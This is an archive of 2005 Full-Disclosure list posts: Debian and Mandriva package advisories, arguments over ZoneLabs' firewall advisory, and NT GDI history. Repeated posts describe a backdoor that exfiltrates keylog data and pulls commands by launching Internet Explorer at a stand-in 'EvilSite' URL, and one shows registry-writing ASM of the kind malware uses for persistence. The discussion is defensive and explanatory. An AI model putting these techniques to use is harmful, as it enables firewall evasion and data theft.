[Full-disclosure] [SECURITY] [DSA 839-1] New apachetop packages fix insecure temporary file

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 839-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 4th, 2005   http://www.debian.org/security/faq
- --

Package: apachetop
Vulnerability  : insecure temporary file
Problem type   : local
Debian-specific: no
CVE ID : CAN-2005-2660

Eric Romang discovered an insecurely created temporary file in
apachetop, a realtime monitoring tool for the Apache webserver that
could be exploited with a symlink attack to overwrite arbitrary files
with the user id that runs apachetop.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 0.12.5-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.12.5-5.

We recommend that you upgrade your apachetop package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1.dsc
  Size/MD5 checksum:  613 cf61395747017a6c8a4319be4cbafe83

http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1.diff.gz
  Size/MD5 checksum: 2956 76b0826270dcf4c51b191b9aaa3f58f8

http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5.orig.tar.gz
  Size/MD5 checksum:   126967 47c40c26319d5718a2a56dcefe06

  Alpha architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_alpha.deb
  Size/MD5 checksum:36262 d532edba02bdf8d4dd2316b68866d906

  AMD64 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_amd64.deb
  Size/MD5 checksum:31370 c8fdae994094269fbe3f597858c8ba14

  ARM architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_arm.deb
  Size/MD5 checksum:30572 dc820d6f5af5a89989705c919f5b8bdb

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_i386.deb
  Size/MD5 checksum:30160 cc20d5d7ab5798ec98966b944259fde4

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_ia64.deb
  Size/MD5 checksum:40446 06f813d834fc7566317c94d4ff07c9ff

  HP Precision architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_hppa.deb
  Size/MD5 checksum:34332 aea9a750be0952a46d1d03f9b0d8d8cd

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_m68k.deb
  Size/MD5 checksum:27844 df4e67fb0a58d32537dd4cb7c88c3e24

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_mips.deb
  Size/MD5 checksum:34964 ab8c82dec697e8567a0b819f25ff1c60

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_mipsel.deb
  Size/MD5 checksum:34864 48009e8eb7bf1cac0178d33bed3594e9

  PowerPC architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_powerpc.deb
  Size/MD5 checksum:33138 22c5a90df13d862497d4fd0060d2d53a

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_s390.deb
  Size/MD5 checksum:31172 120ff918508d38deaf737f22d8a1da96

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/a/apachetop/apachetop_0.12.5-1sarge1_sparc.deb
  Size/MD5 checksum:30532 2a5637a3f94148621756e648b0e9cfdb


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDQiQmW5ql+IAeqTIRAqMDAJ4tZmEDfuJh

RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

[Aditya Deshmukh]

> say... a backdoor want to communicate to its server... It can do
> is, use a trusted internal application to do the job. Suppose; it
> creates a batch file run the batch file  (evil.bat) & executes this
> command

this has been going on for years - there are some trojans that create 
An invisible browser window at the screen center to comm with the 
Server. 

This is the reason most firewalls like show you a popup saying 
the [app-name] trying to connect to [server-name] at [port-number]







Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Different Claims by ZoneLabs on the "BypassingPersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

[Todd Towles]

If a bulb in my car was found to cause a fire in certain models from a
certain manufacturer, I would want to know exactly which one were in
danger...not the other way around. Has ZA tested the other versions?
They know 6 isn't vulnerable but if they don't say that 3 is vulnerable
then we have to "assume" they are. That isn't any type of security
advisory IMHO. 

It just makes the company look like they care more about making you buy
the new version as opposed to protecting their customers. Just my 2
cents

-Todd

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Paul Laudanski
> Sent: Monday, October 03, 2005 6:55 PM
> To: Debasis Mohanty
> Cc: bugtraq@securityfocus.com; 
> full-disclosure@lists.grok.org.uk; 'Zone Labs Security Team'
> Subject: RE: [Full-disclosure] Different Claims by ZoneLabs 
> on the "BypassingPersonalFirewall (Zone Alarm Pro) Using 
> DDE-IPC" issue
> 
> 
> 
> 
> On Mon, 3 Oct 2005, Debasis Mohanty wrote:
> 
> > >> Paul Laudanski
> > >> What I'm saying is that the vendor never claimed ZAP 
> versions prior 
> > >> to 5
> > are not vulnerable in the report.  
> > 
> > Funny Paul!! You are simple exaggerating upon the same 
> point again and 
> > again in a new style each time. Well, They don't even say that ZAP 
> > versions prior to v5 are vulnerable in their advisory.
> 
> Glad I made you laugh.  We are at odds in this clearly.  Zone 
> Labs aka Cisco imvho has issued a fair and accurate release 
> indicating what is not vulnerable and thereby conversely you 
> know which products are.
> 
> To that end... I move on.
> 
> Paul Laudanski, Microsoft MVP Windows-Security 
> CastleCops(SM), http://castlecops.com
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Different Claims by ZoneLabs on the "Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

[Paul Laudanski]

On Mon, 3 Oct 2005, Debasis Mohanty wrote:

> >> Paul Laudanski
> >> What I'm saying is that the vendor never claimed ZAP versions prior to 5
> are not vulnerable in the report.  
> 
> Funny Paul!! You are simple exaggerating upon the same point again and again
> in a new style each time. Well, They don't even say that ZAP versions prior
> to v5 are vulnerable in their advisory. 

Glad I made you laugh.  We are at odds in this clearly.  Zone Labs aka
Cisco imvho has issued a fair and accurate release indicating what is not
vulnerable and thereby conversely you know which products are.

To that end... I move on.

Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3

[Morning Wood]

>Can you give me an example of a trojan, worm, or another program which has
added the last USB device installed in the >Windows Registry,
yes, see below

>or how about a program, worm, trojan -

some ASM code... ( edited )
 any_key1 db "SYSTEM\CurrentControlSet\AnyKeyIWant", 0
  another_key2 db "SYSTEM\CurrentControlSet\AnotherKeyIWant", 0
  invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr any_key1, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, addr hRegkey, NULL
  invoke wsprintf, addr senddata, addr some_value3, addr port
  invoke wsprintf, addr recvdata, addr another_value2, addr port
  invoke RegSetValueEx, hRegkey, addr senddata, 0, REG_SZ, addr recvdata,
eax
  invoke RegCloseKey, hRegkey
( repeat for another_key2 )

easily done in .c too

or
c:\>regedt32 -s somebad.reg
( will silently install ANY key you want )


>which caused something to be added to the last typed URL?
VNC ( or aformentioned key writes )

how do you think malware writes startup keys? I am confused by your
statement...
once a system has been compromised, ANYTHING can be written to the registry
( especialy is the attacker has SYSTEM privs )



my2bits,
M.W


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Steve Friedl]

On Mon, Oct 03, 2005 at 03:41:58PM -0400, TheGesus wrote:
> In NT4 they redesigned the GDI so that the user could bypass
> "userland" and talk straight to the kernel.
> 
> It's been so long I don't recall the exact details, but this re-hack
> paved the way for  DirectX and sped up the response of the new
> desktop, which of course was lifted from WIndows 95.
> 
> After NT4 anything that hooked into the GDI could BSOD.  New video
> driver?  BSOD.  New printer driver?  BSOD.  It was quite a mess.

This is only partly the case; this is the history.

In NT3.51, *all* GDI (printer and video) was done in userland, but
GDI calls involved an expensive context switch and/or local procedure
call. I guess for printer drivers this was not really a big deal,
but for video it matters a lot. Gamers care about this, right?

In NT4 all GDI dove into kernel space, and it provided a substantial
performance boost, but it completely sucked for print driver writers.
No thread support, no real support for floating point math, not any
performance difference to write home about, and a BSOD was as easy
as an assertion failure. Porting a complex user-mode driver to
kernel mode could be a daunting task.

Well, all that silly "but kernel-mode print drivers won't be as robust"
talk turned out to be true, so Windows 2000 supported both kernel mode
(version 2) and user mode (version 3) drivers. I assume that version 1
drivers were NT3.51 usermode.

XP is the same way, and in Server 2003 there is a Group Policy option
that disables kernel mode drivers, and I understand that Vista/Longhorn
will forbid kernel mode print drivers altogether.

Saying that the user "bypasses user mode and talks directly to the
kernel" is not really that meaningful: it doesn't talk "to the kernel",
just to the GDI, and it's not really any different from an IOCTL.

It wasn't terribly robust, but I don't think it was inherently insecure.

Steve (who writes print drivers too)

--- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MDKSA-2005:171 - Updated kernel packages fix multiple vulnerabilities

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   kernel
 Advisory ID:MDKSA-2005:171
 Date:   October 3rd, 2005

 Affected versions:  Corporate 3.0, Multi Network Firewall 2.0
 __

 Problem Description:

 A number of vulnerabilities in the 2.6 Linux kernel have been corrected
 with these updated packages:
 
 An array index overflow in the xfrm_sk_policy_insert function could
 allow a local user to cause a Denial of Service (oops or deadlock) and
 possibly execute arbitrary code (CAN-2005-2456).
 
 The zlib routines in the Linux 2.6 kernel before 2.6.12.5 allowed a
 remote attacker to cause a DoS (crash) via a compressed file with
 "improper tables" (CAN-2005-2458).
 
 The huft_build function in the zlib routines in Linux 2.6 kernels prior
 to 2.6.12.5 returned the wrong value, allowing remote attackers to
 cause a DoS (crash) via a certain compressed file (CAN-2005-2459).
 
 A stack-based buffer overflow in the sendmsg function call in Linux 2.6
 kernels prior to 2.6.13.1 allow local users to execute arbitrary code by
 calling sendmsg and modifying the message contents in another thread
 (CAN-2005-2490).
 
 xattr.c in the ext2 and ext3 file system code in the 2.6 Linux kernel
 did not properly compare the name_index fields when sharing xattr
 blocks which would prevent default ACLs from being applied
 (CAN-2005-2801).
 
 The ipt_recent kernel module in 2.6 Linux kernels prior to 2.6.12 when
 running on 64-bit processors allowed remote attackers to cause a DoS
 (kernel panic) via certain attacks such as SSH brute force
 (CAN-2005-2872).
 
 The ipt_recent kernel module in 2.6 Linux kernels prior to 2.6.12 did
 not properly perform certain time tests when the jiffies value is
 greater than LONG_MAX which could cause ipt_recent netfilter rules to
 block too early (CAN-2005-2873).
 
 The updated packages have been patched to address these issues and all
 users are urged to upgrade immediately.
 
 Updated kernels for Mandrivalinux 10.1 and later will be made available
 soon.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2456
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2458
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2459
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2490
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2801
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2872
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2873
 __

 Updated Packages:
  
 Multi Network Firewall 2.0:
 f7468b4d253251b7c7a5ee84571193c5  
mnf/2.0/RPMS/kernel-2.6.3.28mdk-1-1mdk.i586.rpm
 a9d37454e919b348a708922d2aece2ca  
mnf/2.0/RPMS/kernel-i686-up-4GB-2.6.3.28mdk-1-1mdk.i586.rpm
 790766354d63b081ce608ee769b73574  
mnf/2.0/RPMS/kernel-p3-smp-64GB-2.6.3.28mdk-1-1mdk.i586.rpm
 c5a5e24e5cc9b8c9cc17867966a3d70b  
mnf/2.0/RPMS/kernel-secure-2.6.3.28mdk-1-1mdk.i586.rpm
 7cdb6d2c133e02457229ef6eb2a7b405  
mnf/2.0/RPMS/kernel-smp-2.6.3.28mdk-1-1mdk.i586.rpm
 9c8a3b678f7a51be86a342a59188  
mnf/2.0/SRPMS/kernel-2.6.3.28mdk-1-1mdk.src.rpm

 Corporate 3.0:
 0f6c6ac828beca090b72d4f25b34ded2  
corporate/3.0/RPMS/kernel-2.6.3.28mdk-1-1mdk.i586.rpm
 8b228ab0567e6f8cae1e15fe44261f97  
corporate/3.0/RPMS/kernel-enterprise-2.6.3.28mdk-1-1mdk.i586.rpm
 4177dbd5341d41d1605b83546b1b419b  
corporate/3.0/RPMS/kernel-i686-up-4GB-2.6.3.28mdk-1-1mdk.i586.rpm
 543e310e249819d29d19354cac294376  
corporate/3.0/RPMS/kernel-p3-smp-64GB-2.6.3.28mdk-1-1mdk.i586.rpm
 0a6fd8b7c3434a6e903fa2183e5ef23c  
corporate/3.0/RPMS/kernel-secure-2.6.3.28mdk-1-1mdk.i586.rpm
 fccb12c9f27dc1b72e4d1ff212ae29d0  
corporate/3.0/RPMS/kernel-smp-2.6.3.28mdk-1-1mdk.i586.rpm
 15a9d0b1914ca4b47dc49d694ede1c33  
corporate/3.0/RPMS/kernel-source-2.6.3-28mdk.i586.rpm
 a62fc25d549523e00efa006644543dda  
corporate/3.0/RPMS/kernel-source-stripped-2.6.3-28mdk.i586.rpm
 9c8a3b678f7a51be86a342a59188  
corporate/3.0/SRPMS/kernel-2.6.3.28mdk-1-1mdk.src.rpm

 Corporate 3.0/X86_64:
 8ad1a6656bc68149b775b6012b4b3d10  
x86_64/corporate/3.0/RPMS/kernel-2.6.3.28mdk-1-1mdk.x86_64.rpm
 aced128f099513e241f79bceaff13733  
x86_64/corporate/3.0/RPMS/kernel-secure-2.6.3.28mdk-1-1mdk.x86_64.rpm
 c67c7c76be4a011de9a6e2c26bd22af6  
x86_64/corporate/3.0/RPMS/kernel-smp-2.6.3.28mdk-1-1mdk.x86_64.rpm
 aef5ccc688591da64d004c4eb50a8ad4  
x86_64/corporate/3.0/RPMS/kernel-source-2.6.3-28mdk.x86_64.rpm
 2436bca0b07afefecdba53f24a9c8f73  
x86_64/corporate/3.0/RPMS/kernel-source-stripped-2.6.3-28mdk.x86_64.rpm
 9c8a3b678f7a51be86a342a59188  
x86_64/corporate/3.0/SRPMS/

Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

[Oliver Leitner]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I think the main problem of every kind of security precaution is, that
the user has to understand what he is being told.

i had customers who just let everything in and out because they thought
that their setup would need it.


a few major tricks in really securing a sys:
never let the user have write access to c:\putyourwindowssystemdirhere

never run anything as admin user (at least since xp there is even
something like sudo under windows available, called runas, very useful
command).

further on the xp level: try to get used to the netsh command.

keep your system updated

and doesnt matter what you download, as long as you keep your users
security aware (password length and strongeness, email clicking, banner
clicking, popups, etc...)

or use an alternate os (yes, they are out there...)

you can make it easier for your user or harder for your user, depending
on your standpoint, but nothing is as good as a user that actually does
know what he/she is doing.

just my few cents.

Greetings
Oliver Leitner
Technical Staff
http://www.shells.at

Debasis Mohanty wrote:
> Just to correct my last statement in my previous reply - 
> 
>>>There is another way by which an evil-code can get this run is by moving
> 
> the batch file to system startup 
> 
>>>or pointing it in the registry to run on system boot but this will be a
> 
> warning signal for the user.  
> 
> Even ZA Pro blocks and warns the user if some program (evil or trusted) is
> trying to become a system startup program. Sorry for that mistake had tooo
> much with Paul & Zone Labs ;-)
> 
> -D
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Debasis
> Mohanty
> Sent: Tuesday, October 04, 2005 12:25 AM
> To: 'Bipin Gautam'; 'Zone Labs Security Team'
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that*
> hard?
> 
> Bipin Gautam wrote:
> 
>>>Anyways... is Bypassing Personal Firewall & let an internal (evil)
> 
> application communicate 
> 
>>>with the external world,  the hard.  
> 
> 
> Yes Indeed !! As long as you are trying out this concept with the current
> versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it
> even traps inter-process communications and windows messaging between two
> different processes and prompts for user's permission. This goes ahead of
> normal desktop based fw with more defense methods than just protecting a PC
> from network based attacks. 
> 
> 
> 
>>>Suppose; it creates a batch file run the batch file  (evil.bat) &
> 
> executes this command
> 
>>>Internet Explorer\> iexplore.exe
> 
> www.EvilSite.com/?cmd=submit&f=___KeyLog__
> 
> To execute the batch file, the evil-program needs to trigger the execution
> of the batch file and this is easily prevented by ZA Pro.. Normally the
> evil-code will use the api shell() which is prevented. 
> 
> However, this will work if the users click on the batch file or run it via
> Start->Run but this is not the way a evil-code works. In this scenario 
> Start->ZA
> Pro clearly distinguishes between user interventions and a program
> communicating with another program. 
> 
> 
> There is another way by which an evil-code can get this run is by moving the
> batch file to system startup or pointing it in the registry to run on system
> boot but this will be a warning signal for the user. 
> 
> - D
> 
> 
> 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
> Sent: Monday, October 03, 2005 11:57 PM
> To: Zone Labs Security Team
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?
> 
> hello list,
> Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
> Bypassing Personal Firewall & let an internal (evil) application communicate
> with the external world,  the hard. I mean... OK try this Lets.. me
> give you a simple concept. I'll call it 'passive communication' ( in lack of
> better world)
> 
> say... a backdoor want to communicate to its server... It can do is, use
> a trusted internal application to do the job. Suppose; it creates a batch
> file run the batch file  (evil.bat) & executes this command
> 
> Internet Explorer\> iexplore.exe
> www.EvilSite.com/?cmd=submit&f=___KeyLog__
> 
> the batch file will get executed & Internet explorer will happily send the
> DATA. This trick can be used to send OUTPUT as well as get input... without
> trigering the firewall.
> 
> To get input; the backdoor can do is... say, run similar BAT script:
> 
> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS
> 
> well... the history of the page
> www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then
> the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if
> there

Re: [Full-disclosure] Bigger burger roll needed

[TheGesus]

> On Mon, 03 Oct 2005 06:42:37 PDT, Steve Friedl said:
> > On Mon, Oct 03, 2005 at 08:50:27AM -0400, [EMAIL PROTECTED] wrote:

> Perhaps if they hadn't been so busy designing baroque undocumented APIs for 
> the
> use of their own monopolistic software(*), they could have designed a cleaner 
> API
> that would have resulted in more stable third-party drivers ;)
>

They did have such an API at one time... in NT 3.51.

In NT4 they redesigned the GDI so that the user could bypass
"userland" and talk straight to the kernel.

It's been so long I don't recall the exact details, but this re-hack
paved the way for  DirectX and sped up the response of the new
desktop, which of course was lifted from WIndows 95.

After NT4 anything that hooked into the GDI could BSOD.  New video
driver?  BSOD.  New printer driver?  BSOD.  It was quite a mess.

Still is.

Worst design flaw ever.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Valdis . Kletnieks]

On Mon, 03 Oct 2005 06:42:37 PDT, Steve Friedl said:
> On Mon, Oct 03, 2005 at 08:50:27AM -0400, [EMAIL PROTECTED] wrote:
> > One acronym: BSOD.  Why have users learned what it is, and grown accepting 
> > of
> > seeing one?  Do you know any Windows users who have *never* encountered one?
> 
> The majority of BSODs are caused by buggy third-party drivers and malware
> (rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?

Perhaps if they hadn't been so busy designing baroque undocumented APIs for the
use of their own monopolistic software(*), they could have designed a cleaner 
API
that would have resulted in more stable third-party drivers ;)

(*) Yes, they exist.  Remember MS having to open and document them as part of
one of their anti-trust losses? ;)


pgpr9ctjdPU2H.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

[Debasis Mohanty]

Just to correct my last statement in my previous reply - 
>> There is another way by which an evil-code can get this run is by moving
the batch file to system startup 
>> or pointing it in the registry to run on system boot but this will be a
warning signal for the user.  

Even ZA Pro blocks and warns the user if some program (evil or trusted) is
trying to become a system startup program. Sorry for that mistake had tooo
much with Paul & Zone Labs ;-)

-D

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Debasis
Mohanty
Sent: Tuesday, October 04, 2005 12:25 AM
To: 'Bipin Gautam'; 'Zone Labs Security Team'
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that*
hard?

Bipin Gautam wrote:
>> Anyways... is Bypassing Personal Firewall & let an internal (evil)
application communicate 
>> with the external world,  the hard.  

Yes Indeed !! As long as you are trying out this concept with the current
versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it
even traps inter-process communications and windows messaging between two
different processes and prompts for user's permission. This goes ahead of
normal desktop based fw with more defense methods than just protecting a PC
from network based attacks. 


>> Suppose; it creates a batch file run the batch file  (evil.bat) &
executes this command
>> Internet Explorer\> iexplore.exe
www.EvilSite.com/?cmd=submit&f=___KeyLog__

To execute the batch file, the evil-program needs to trigger the execution
of the batch file and this is easily prevented by ZA Pro.. Normally the
evil-code will use the api shell() which is prevented. 

However, this will work if the users click on the batch file or run it via
Start->Run but this is not the way a evil-code works. In this scenario 
Start->ZA
Pro clearly distinguishes between user interventions and a program
communicating with another program. 


There is another way by which an evil-code can get this run is by moving the
batch file to system startup or pointing it in the registry to run on system
boot but this will be a warning signal for the user. 

- D



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
Sent: Monday, October 03, 2005 11:57 PM
To: Zone Labs Security Team
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application communicate
with the external world,  the hard. I mean... OK try this Lets.. me
give you a simple concept. I'll call it 'passive communication' ( in lack of
better world)

say... a backdoor want to communicate to its server... It can do is, use
a trusted internal application to do the job. Suppose; it creates a batch
file run the batch file  (evil.bat) & executes this command

Internet Explorer\> iexplore.exe
www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet explorer will happily send the
DATA. This trick can be used to send OUTPUT as well as get input... without
trigering the firewall.

To get input; the backdoor can do is... say, run similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then
the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if
there is any new job to acomplish.

just a rough theory... but ya its POSSIBLE; to let a internal backdoor have
I/O with its server without trigering the firewall alert

---
yap it does work... using the same trick can't the backdoor happily
communicate with its server using the trick

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) 
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue 
> with personal firewalls to several security email lists on
> September 28th, 2005.   Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and Check Point 
> end-point security products are not vulnerable.
>
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access the 
> network on behalf of the untrusted program, thereby accessing the 
> network without warning from the firewall.
>
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program.   The ability to
> access the network would be limited to the functionality of the 
> trusted program.
>
>
> Unaffected Products:
>
> ZoneAlarm Pro, ZoneA

Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

[Thierry Zoller]

> integrated HIPS. (although a fonction which
>can be very annoying sometimes.)
To be more precise they call it "behavior blocking".

--
Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

[Debasis Mohanty]

Bipin Gautam wrote:
>> Anyways... is Bypassing Personal Firewall & let an internal (evil)
application communicate 
>> with the external world,  the hard.  

Yes Indeed !! As long as you are trying out this concept with the current
versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it
even traps inter-process communications and windows messaging between two
different processes and prompts for user's permission. This goes ahead of
normal desktop based fw with more defense methods than just protecting a PC
from network based attacks. 


>> Suppose; it creates a batch file run the batch file  (evil.bat) &
executes this command
>> Internet Explorer\> iexplore.exe
www.EvilSite.com/?cmd=submit&f=___KeyLog__

To execute the batch file, the evil-program needs to trigger the execution
of the batch file and this is easily prevented by ZA Pro.. Normally the
evil-code will use the api shell() which is prevented. 

However, this will work if the users click on the batch file or run it via
Start->Run but this is not the way a evil-code works. In this scenario ZA
Pro clearly distinguishes between user interventions and a program
communicating with another program. 


There is another way by which an evil-code can get this run is by moving the
batch file to system startup or pointing it in the registry to run on system
boot but this will be a warning signal for the user. 

- D



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
Sent: Monday, October 03, 2005 11:57 PM
To: Zone Labs Security Team
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application communicate
with the external world,  the hard. I mean... OK try this Lets.. me
give you a simple concept. I'll call it 'passive communication' ( in lack of
better world)

say... a backdoor want to communicate to its server... It can do is, use
a trusted internal application to do the job. Suppose; it creates a batch
file run the batch file  (evil.bat) & executes this command

Internet Explorer\> iexplore.exe
www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet explorer will happily send the
DATA. This trick can be used to send OUTPUT as well as get input... without
trigering the firewall.

To get input; the backdoor can do is... say, run similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then
the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if
there is any new job to acomplish.

just a rough theory... but ya its POSSIBLE; to let a internal backdoor have
I/O with its server without trigering the firewall alert

---
yap it does work... using the same trick can't the backdoor happily
communicate with its server using the trick

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) 
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue 
> with personal firewalls to several security email lists on
> September 28th, 2005.   Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and Check Point 
> end-point security products are not vulnerable.
>
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access the 
> network on behalf of the untrusted program, thereby accessing the 
> network without warning from the firewall.
>
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program.   The ability to
> access the network would be limited to the functionality of the 
> trusted program.
>
>
> Unaffected Products:
>
